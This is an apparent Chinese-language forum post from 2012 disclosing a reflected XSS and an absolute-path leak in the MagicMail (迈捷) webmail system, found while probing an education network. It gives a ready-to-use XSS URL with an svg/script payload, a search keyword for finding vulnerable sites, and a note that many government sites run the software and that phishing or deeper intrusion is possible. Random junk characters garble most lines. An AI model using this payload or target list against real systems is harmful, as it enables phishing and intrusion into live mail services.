今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞1 [! a) `2 M7 x4 g2 S& @; d. _
- |/ Z% P' a ~+ F: C
0 E! J; N @$ e$ i7 J3 s7 G包含 一个反射性XSS 以及 绝对路径泄漏
' E" _. t1 `- ~" I6 ]# C看了看 貌似全部是linux的。. p0 K# M: |8 b& w/ y: w+ N X
3 P; \& D# F8 e; _' [9 {关键字:迈捷邮件系统 by MagicMail% L% G8 k. l: ^0 s5 c
$ ~* a3 \' s$ s; {; G
可以看到很多政府网站都用这个邮件系统
5 ~0 B! o) \: U; M m. G% a0 g- f
/ J! S9 q9 D5 O9 U绝对路径 http://madman.in/index.php?login_type=declare&language=
. {8 X q2 V9 c7 D
$ Q/ ]6 n7 s7 Q) D$ h5 P9 o
% ]' `- Z! _# z+ q( [5 h- N6 N- i$ H2 q, g) s: T0 D ?
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
8 W- O; w7 e. {2 d$ q( U5 e- R5 X5 T6 N8 _9 O3 z$ g) Q
c3 D# e8 c @' O3 D9 g" n# h- E' y. _+ M3 k. T
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
0 v# B) @, X1 l; q6 }+ b8 A! m
" H7 u" d0 C1 f1 `- [修复方案:看官方补丁吧。: l8 R2 G( t @; t+ r
|
发表于 2012-11-9 20:38:41
收藏
支持
反对